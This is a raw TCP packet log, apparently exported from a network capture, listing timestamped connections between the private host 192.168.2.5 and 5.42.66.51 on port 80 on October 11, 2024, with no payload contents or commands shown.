                                                                                                Oct 11, 2024 20:37:48.942590952 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.311574936 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.316498995 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.316555977 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.316567898 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.316576004 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.316581964 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.316629887 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.316631079 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.316644907 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.316658974 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.316699982 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.316803932 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.316843033 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.316862106 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.316888094 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.316901922 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.316936970 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.321727991 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.321794033 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.321844101 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.321857929 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.321870089 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.321883917 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.321894884 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.321896076 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.321917057 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.322002888 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.364238977 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.364404917 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.412256956 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.412329912 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.464262962 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.464402914 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.512271881 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.512351036 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.560477018 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.560558081 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.608239889 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.608299017 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.656424999 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.656486034 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.697901964 CEST4990280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.702785015 CEST80499025.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.702863932 CEST4990280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.704236984 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.704282999 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.704802036 CEST4990280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.709723949 CEST80499025.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.752317905 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.752384901 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.800334930 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.800385952 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.852319002 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.852411032 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.900317907 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.900366068 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.948287010 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.948352098 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.996223927 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.996272087 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:50.044251919 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:50.044317007 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:50.081835985 CEST4990280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:50.086728096 CEST80499025.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:50.086895943 CEST80499025.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:50.092222929 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:50.092346907 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:50.140456915 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:50.140516043 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:50.188254118 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:50.189208031 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:50.236336946 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:50.236416101 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:50.284305096 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:50.284389973 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:50.538903952 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:50.538968086 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:50.539520025 CEST80499025.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:50.546231031 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:50.546289921 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:50.557661057 CEST80499025.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:50.557724953 CEST4990280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:50.596276045 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:50.596406937 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:50.644275904 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:50.644386053 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:50.696320057 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:50.696614027 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:50.744498968 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:50.744617939 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:50.792237997 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:50.792356014 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:50.846565962 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:51.610474110 CEST4990280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:51.610946894 CEST4991380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:51.616506100 CEST80499025.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:51.616556883 CEST4990280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:51.616633892 CEST80499135.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:51.616704941 CEST4991380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:51.616833925 CEST4991380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:51.621761084 CEST80499135.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:51.966861963 CEST4991380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:51.971815109 CEST80499135.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:51.972127914 CEST80499135.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:52.320821047 CEST80499135.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:52.419903040 CEST4991380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:13.858397961 CEST5000780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:13.965629101 CEST5000780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:13.966093063 CEST5000980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:13.971029043 CEST80500075.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:13.971091986 CEST5000780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:13.972026110 CEST80500095.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:13.972094059 CEST5000980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:13.972225904 CEST5000980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:13.977684975 CEST80500095.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:14.326225996 CEST5000980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:14.331429958 CEST80500095.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:14.331484079 CEST80500095.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:14.331511974 CEST80500095.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:14.680957079 CEST80500095.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:14.807430029 CEST80500095.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:14.807518005 CEST5000980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:15.947443962 CEST5000980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:15.947824955 CEST5001080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:15.953380108 CEST80500105.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:15.953567028 CEST5001080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:15.954253912 CEST5001080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:15.954838991 CEST80500095.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:15.955235958 CEST5000980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:15.959319115 CEST80500105.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:16.310688972 CEST5001080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:16.316015005 CEST80500105.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:16.316082001 CEST80500105.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:16.316112995 CEST80500105.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:16.641030073 CEST80500105.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:16.749174118 CEST5001080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:16.798054934 CEST80500105.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:16.953658104 CEST5001080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:16.991592884 CEST5001080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:16.991889000 CEST5001180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:16.997987032 CEST80500105.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:16.998025894 CEST80500115.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:16.998060942 CEST5001080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:16.998214960 CEST5001180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:17.012120962 CEST5001180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:17.017316103 CEST80500115.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:17.231440067 CEST80500085.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:17.363260984 CEST80500085.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:17.363487005 CEST5000880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:17.384345055 CEST5001180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:17.389231920 CEST80500115.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:17.389381886 CEST80500115.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:17.389409065 CEST80500115.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:17.743748903 CEST80500115.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:17.826237917 CEST5001180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:17.875227928 CEST80500115.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:18.029268980 CEST5001180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:18.121179104 CEST5000880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:18.121426105 CEST5001180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:18.121654987 CEST5001280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:18.126439095 CEST80500085.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:18.126595974 CEST5000880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:18.126703978 CEST80500125.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:18.126770973 CEST5001280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:18.126899004 CEST5001280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:18.127546072 CEST80500115.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:18.127664089 CEST5001180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:18.131961107 CEST80500125.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:18.417077065 CEST5001380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:18.422246933 CEST80500135.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:18.422333002 CEST5001380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:18.422544956 CEST5001380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:18.428400993 CEST80500135.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:18.482461929 CEST5001280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:18.487801075 CEST80500125.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:18.487838030 CEST80500125.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:18.487865925 CEST80500125.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:18.780086994 CEST5001380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:18.785192966 CEST80500135.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:18.785504103 CEST80500135.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:18.855479002 CEST80500125.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:18.919905901 CEST5001280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:18.989119053 CEST80500125.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:19.029283047 CEST5001280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:19.119211912 CEST80500135.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:19.163261890 CEST5001280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:19.163701057 CEST5001480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:19.169004917 CEST80500145.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:19.169116974 CEST5001480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:19.169430971 CEST5001480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:19.169488907 CEST80500125.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:19.169598103 CEST5001280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:19.174343109 CEST80500145.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:19.247859955 CEST80500135.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:19.247932911 CEST5001380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:19.513806105 CEST5001480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:19.518929958 CEST80500145.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:19.519098997 CEST80500145.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:19.519114017 CEST80500145.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:19.874109030 CEST80500145.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:20.009227037 CEST80500145.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:20.009294033 CEST5001480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:20.586677074 CEST5001380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:20.587105989 CEST5001480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:20.592434883 CEST5001580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:20.593785048 CEST80500135.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:20.593920946 CEST5001380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:20.595581055 CEST80500145.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:20.595633030 CEST5001480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:20.597467899 CEST80500155.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:20.597548962 CEST5001580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:20.597652912 CEST5001580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:20.603151083 CEST80500155.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:20.736066103 CEST5001680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:20.741209030 CEST80500165.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:20.741286039 CEST5001680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:20.741406918 CEST5001680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:20.746469975 CEST80500165.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:20.951256990 CEST5001580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:20.956319094 CEST80500155.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:20.958720922 CEST80500155.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:21.091864109 CEST5001680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:21.096786976 CEST80500165.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:21.096935987 CEST80500165.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:21.097461939 CEST80500165.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:21.353313923 CEST80500155.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:21.435524940 CEST5001580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:21.487262011 CEST80500155.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:21.508263111 CEST80500165.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:21.544894934 CEST5001580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:21.641164064 CEST80500165.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:21.641315937 CEST5001680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:21.762857914 CEST5001580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:21.763034105 CEST5001680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:21.763319969 CEST5001780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:21.768336058 CEST80500155.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:21.768393040 CEST5001580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:21.768469095 CEST80500175.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:21.768853903 CEST5001780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:21.769016981 CEST5001780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:21.769402981 CEST80500165.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:21.769452095 CEST5001680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:21.773979902 CEST80500175.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:22.123220921 CEST5001780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:22.128190041 CEST80500175.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:22.128257036 CEST80500175.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:22.128271103 CEST80500175.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:22.458251953 CEST80500175.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:22.503130913 CEST5001880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:22.508085012 CEST80500185.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:22.508245945 CEST5001880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:22.508526087 CEST5001880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:22.513664961 CEST80500185.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:22.587789059 CEST80500175.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:22.587867975 CEST5001780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:22.735690117 CEST5001780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:22.736627102 CEST5001980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:22.741031885 CEST80500175.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:22.741086006 CEST5001780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:22.741470098 CEST80500195.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:22.741534948 CEST5001980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:22.741631985 CEST5001980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:22.746534109 CEST80500195.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:22.857636929 CEST5001880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:22.863898993 CEST80500185.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:22.864005089 CEST80500185.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:23.091861963 CEST5001980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:23.096950054 CEST80500195.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:23.096975088 CEST80500195.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:23.096987963 CEST80500195.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:26.221218109 CEST80500185.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:26.380939007 CEST80500185.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:26.381129026 CEST5001880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:26.455749989 CEST80500195.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:26.502000093 CEST5001980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:26.599823952 CEST80500195.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:26.759736061 CEST5001980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:26.888494968 CEST5001880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:26.888921022 CEST5001980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:36.623825073 CEST5003480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:36.628926992 CEST80500345.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:36.628940105 CEST80500345.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:36.629213095 CEST80500345.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:36.639323950 CEST5003580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:36.644581079 CEST80500355.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:36.644690037 CEST5003580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:36.645514011 CEST5003580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:36.650393963 CEST80500355.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:36.963489056 CEST80500345.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:37.000258923 CEST5003580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:37.006336927 CEST80500355.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:37.006583929 CEST80500355.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:37.044914961 CEST5003480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:37.095158100 CEST80500345.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:37.248037100 CEST5003480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:37.349616051 CEST80500355.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:37.398099899 CEST5003580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:37.422802925 CEST5003480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:37.423119068 CEST5003680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:37.428370953 CEST80500345.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:37.428448915 CEST5003480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:37.429775953 CEST80500365.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:37.429852009 CEST5003680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:37.430051088 CEST5003680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:37.434984922 CEST80500365.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:37.487339973 CEST80500355.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:37.529297113 CEST5003580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:37.779566050 CEST5003680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:37.785079956 CEST80500365.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:37.785094976 CEST80500365.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:37.785125971 CEST80500365.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:38.114505053 CEST80500365.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:38.169975042 CEST5003680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:38.243510008 CEST80500365.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:38.294986963 CEST5003680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:38.501646996 CEST5003580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:38.501646042 CEST5003680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:38.502443075 CEST5003780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:38.507280111 CEST80500355.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:38.507406950 CEST5003580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:38.507606983 CEST80500375.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:38.507688999 CEST5003780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:38.507783890 CEST5003780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:38.508656025 CEST80500365.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:38.508713007 CEST5003680192.168.2.55.42.66.51
